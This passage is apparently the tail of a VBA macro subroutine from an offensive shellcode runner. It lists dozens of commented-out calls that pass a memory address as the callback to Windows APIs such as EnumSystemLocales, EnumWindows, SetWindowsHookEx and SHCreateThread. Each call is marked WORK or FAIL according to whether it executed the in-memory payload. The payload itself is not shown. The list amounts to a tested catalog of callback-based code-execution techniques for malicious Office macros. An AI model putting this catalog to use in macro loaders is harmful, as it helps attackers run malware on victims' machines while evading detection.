    'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumSystemLanguageGroupsW
    'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumSystemLocalesA
    'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumSystemLocalesW
    'executeResult = shellExecute(zL, memoryAddress, zL) ' WORK EnumThreadWindows
    'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumTimeFormatsA
    'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumTimeFormatsW
    'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumUILanguagesA
    'executeResult = shellExecute(memoryAddress, zL, zL) ' WORK EnumUILanguagesW
    'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumWindowStationsA
    'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumWindowStationsW
    'executeResult = shellExecute(memoryAddress, zL) ' WORK EnumWindows
    'executeResult = shellExecute(processHandle, memoryAddress, zL) ' WORK EnumerateLoadedModules
    'executeResult = shellExecute(processHandle, memoryAddress, zL) ' WORK EnumerateLoadedModulesEx
    'executeResult = shellExecute(processHandle, memoryAddress, zL) ' WORK EnumerateLoadedModulesExW
    'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, oL, oL, oL, oL, oL) ' WORK GrayStringA
    'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, oL, oL, oL, oL, oL) ' WORK GrayStringW
    'executeResult = shellExecute(zL, memoryAddress, oL, oL, oL) ' WORK NotifyIpInterfaceChange
    'executeResult = shellExecute(memoryAddress, oL, oL, oL) ' WORK NotifyTeredoPortChange
    'executeResult = shellExecute(zL, memoryAddress, oL, oL, oL) ' WORK NotifyUnicastIpAddressChange
    'executeResult = shellExecute(zL, zL, zL, memoryAddress) ' WORK SHCreateThread
    'executeResult = shellExecute(zL, zL, zL, memoryAddress, processHandle) ' WORK SHCreateThreadWithHandle
    'executeResult = shellExecute(windowHandle, zL, zL, zL, memoryAddress, zL) ' WORK SendMessageCallbackA
    'executeResult = shellExecute(windowHandle, zL, zL, zL, memoryAddress, zL) ' WORK SendMessageCallbackW
    'executeResult = shellExecute(zL, oL, moduleHandle, memoryAddress, zL, zL, zL) ' WORK SetWinEventHook (Works only if you trigger event, so possibly calling NotifyWinEvent - didn't get it working outside of debugger so not including)
    'executeResult = shellExecute(zL, memoryAddress, zL, zL) ' WORK SetWindowsHookExA
    'executeResult = shellExecute(zL, memoryAddress, zL, zL) ' WORK SetWindowsHookExW

    ' ####################
    ' # FAILED FUNCTIONS #
    ' ####################

    'executeResult = shellExecute(oL, oL, memoryAddress, oL) ' FAIL AddClusterNode
    'executeResult = shellExecute(zL, zL, memoryAddress, zL) ' NODLL BluetoothRegisterForAuthentication
    'executeResult = shellExecute(oL, oL, oL, oL, oL, oL, oL, oL, oL, memoryAddress, oL) ' FAIL CMTranslateRGBsExt
    'executeResult = shellExecute(zL, memoryAddress, zL) ' FAIL CreateCluster (May work if you pass cluster config)
    'executeResult = shellExecute(oL, oL, windowHandle, memoryAddress, zL) ' FAIL CreateDialogIndirectParamA
    'executeResult = shellExecute(oL, oL, windowHandle, memoryAddress, zL) ' FAIL CreateDialogIndirectParamW
    'executeResult = shellExecute(moduleHandle, oL, windowHandle, memoryAddress, zL) ' FAIL CreateDialogParamA
    'executeResult = shellExecute(moduleHandle, oL, windowHandle, memoryAddress, zL) ' FAIL CreateDialogParamW
    'executeResult = shellExecute(zL, zL, zL, zL, memoryAddress, zL) ' CANTFIND CreatePrintAsyncNotifyChannel
    'executeResult = shellExecute(oL, zL, memoryAddress, zL, oL, oL, oL) ' FAIL CreateTimerQueueTimer
    'executeResult = shellExecute(memoryAddress, zL) ' NODLL DavRegisterAuthCallback
    'executeResult = shellExecute(moduleHandle, memoryAddress, oL, zL) ' FAIL DestroyCluster
    'executeResult = shellExecute(moduleHandle, oL, windowHandle, memoryAddress, oL) ' FAIL DialogBoxParamA
    'executeResult = shellExecute(moduleHandle, oL, windowHandle, memoryAddress, oL) ' FAIL DialogBoxParamW
    'executeResult = shellExecute(moduleHandle, moduleHandle, memoryAddress, oL, oL, oL, oL, oL, oL, oL) ' FAIL DrawStateA
    'executeResult = shellExecute(moduleHandle, moduleHandle, memoryAddress, oL, oL, oL, oL, oL, oL, oL) ' FAIL DrawStateW
    'executeResult = shellExecute(oL, memoryAddress, oL) ' FAIL EnumChildWindows
    'executeResult = shellExecute(oL, oL, memoryAddress, oL, oL) ' FAIL EnumEnhMetaFile
    'executeResult = shellExecute(oL, oL, memoryAddress, oL) ' FAIL EnumFontFamiliesA
    'executeResult = shellExecute(oL, oL, memoryAddress, oL) ' FAIL EnumFontFamiliesW
    'executeResult = shellExecute(oL, oL, memoryAddress, oL, zL) ' FAIL EnumFontFamiliesExA
    'executeResult = shellExecute(oL, oL, memoryAddress, oL, zL) ' FAIL EnumFontFamiliesExW
    'executeResult = shellExecute(oL, oL, memoryAddress, oL) ' FAIL EnumFontsA
    'executeResult = shellExecute(gethandle, memoryAddress, oL) ' FAIL EnumICMProfilesA
    'executeResult = shellExecute(gethandle, memoryAddress, oL) ' FAIL EnumICMProfilesW
    'executeResult = shellExecute(oL, oL, memoryAddress, zL) ' FAIL EnumMetaFile
    'executeResult = shellExecute(zL, oL, memoryAddress, oL) ' FAIL EnumObjects
    'executeResult = shellExecute(windowHandle, oL, oL, memoryAddress, zL) ' FAIL EnumResourceLanguagesA
    'executeResult = shellExecute(windowHandle, oL, oL, memoryAddress, zL) ' FAIL EnumResourceLanguagesW
    'executeResult = shellExecute(windowHandle, oL, oL, memoryAddress, zL, oL, zL) ' FAIL EnumResourceLanguagesExA
    'executeResult = shellExecute(windowHandle, oL, oL, memoryAddress, zL, oL, zL) ' FAIL EnumResourceLanguagesExW
    'rL = 9
    'executeResult = shellExecute(moduleHandle, rL, memoryAddress, zL) ' FAIL EnumResourceNamesA
    'executeResult = shellExecute(zL, oL, memoryAddress, oL) ' FAIL EnumResourceNamesW
    'executeResult = shellExecute(zL, oL, memoryAddress, oL, zL, zL) ' FAIL EnumResourceNamesExA
    'executeResult = shellExecute(zL, oL, memoryAddress, oL, zL, zL) ' FAIL EnumResourceNamesExW
    'executeResult = shellExecute(oL, oL, memoryAddress, zL) ' FAIL EventRegister
    'executeResult = shellExecute(processHandle, memoryAddress, oL, oL, oL) ' FAIL GetApplicationRecoveryCallback
    'executeResult = shellExecute(oL, oL, oL, oL, memoryAddress, oL) ' FAIL LineDDA
    'executeResult = shellExecute(zL, moduleHandle, memoryAddress, oL, oL) ' FAIL NotifyStableUnicastIpAddressTable
    'executeResult = shellExecute(oL, memoryAddress, oL) ' FAIL PerfStartProvider
    'executeResult = shellExecute(memoryAddress, processHandle, oL) ' FAIL ReadEncryptedFileRaw (Might work with some time)
    'executeResult = shellExecute(memoryAddress, oL, zL, zL) ' FAIL RegisterApplicationRecoveryCallback
    'executeResult = shellExecute(zL, zL, zL, zL, memoryAddress, zL) ' NOFUNC RegisterForPrintAsyncNotifications
    'executeResult = shellExecute(processHandle, memoryAddress, processHandle) ' FAIL RegisterServiceCtrlHandlerExA
    'executeResult = shellExecute(processHandle, memoryAddress, processHandle) ' FAIL RegisterServiceCtrlHandlerExW
    'rL = 4
    'executeResult = shellExecute(moduleHandle, moduleHandle, memoryAddress, oL, oL, rL) ' FAIL RegisterWaitForSingleObject (Might work with some time)
    'executeResult = shellExecute(oL, oL, memoryAddress, oL, oL, oL, oL) ' FAIL SetTimerQueueTimer (Might work with some time)
    'executeResult = shellExecute(processHandle, oL, zL, zL, memoryAddress, zL) ' ERRBADCALL SymEnumLines
    'executeResult = shellExecute(memoryAddress, oL) ' ERRBADCALL SymEnumProcesses
    'executeResult = shellExecute(processHandle, oL, zL, zL, zL, zL, memoryAddress, zL) ' ERRBADCALL SymEnumSourceLines
    'executeResult = shellExecute(processHandle, oL, oL, memoryAddress, oL) ' ERRBADCALL SymEnumSymbols
    'executeResult = shellExecute(oL, oL, zL, oL, oL, zL, oL, zL, zL, memoryAddress, oL) ' FAIL TranslateBitmapBits
    'executeResult = shellExecute(zL, memoryAddress, zL, zL) ' NODLL WPUQueryBlockingCallback
    'executeResult = shellExecute(zL, zL, zL, zL, zL, zL, memoryAddress, zL, zL) ' NODLL WdsCliTransferFile
    'executeResult = shellExecute(moduleHandle, zL, zL, memoryAddress, oL, moduleHandle, oL) ' FAIL WlanRegisterNotification
    'executeResult = shellExecute(memoryAddress, memoryAddress, memoryAddress) ' FAIL WriteEncryptedFileRaw
    'executeResult = shellExecute(moduleHandle, memoryAddress, zL, zL) ' FAIL WsPullBytes
    'executeResult = shellExecute(oL, memoryAddress, oL) ' FAIL mciSetYieldProc
    'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, zL) ' FAIL midiInOpen

    Stop

End Sub